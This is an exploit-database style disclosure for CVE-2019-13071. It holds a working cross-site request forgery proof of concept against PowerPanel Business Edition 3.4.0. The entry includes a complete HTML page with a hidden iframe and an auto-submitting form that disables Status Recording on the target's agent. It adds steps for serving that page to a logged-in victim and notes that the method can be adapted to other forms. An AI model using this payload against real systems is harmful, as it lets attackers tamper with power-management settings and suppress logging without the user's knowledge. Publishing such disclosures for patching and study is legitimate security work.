PowerPanel Business Edition version 3.4.0 is vulnerable to cross site request forgery vulnerability. This can be exploited by tricking an authenticated user into visiting a web page controlled by a malicious person.
11318105c332adaa97be48d02d687183f89dd6dd389690f77986df69774314ce
# Exploit Title: PowerPanel Business Edition 3.4.0 - Cross Site Request
Forgery
# Date: 7/9/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : CVE-2019-13071
# Reported to vendor on 5/25/2019, no acknowledgement.
The Agent/Center component of PowerPanel Business Edition is vulnerable to
cross site request forgery. This can be exploited by tricking an
authenticated user into visiting a web page controlled by a malicious
person.
The following example uses CSRF to disable Status Recording under the Logs
/ Settings page. Create a file named 'csrf.html' on a local workstation
with the following contents:
<iframe style="display:none" name="csrf-frame"></iframe>
<div style="display: none;">
<form method='POST' action='http://(A VALID HOST
NAME):3052/agent/log_options' target="csrf-frame" id="csrf-form">
<input type='hidden' name='value(recordingEnable)' value='no'>
<input type='hidden' name='value(recordingInterval)' value='10'>
<input type='hidden' name='value(periodToRemoveRecord)' value='2'>
<input type='hidden' name='value(clearAllStatusLogs)' value='no'>
<input type='hidden' name='value(type)' value='records'>
<input type='hidden' name='value(action)' value='Apply'>
<input type='hidden' name='value(button)' value='Apply'>
<input type='submit' value='submit'>
</form>
</div>
<script>document.getElementById("csrf-form").submit()</script>
Serve the file using python or any other web server:
python -m SimpleHTTPServer 8000
Visit the local page in a browser while logged into PowerPanel Business
Edition:
http://localhost:8000/csrf.html
The hidden form is submitted in the background, and will disable Status
Recording. This could be adapted to exploit other forms in the web
application as well.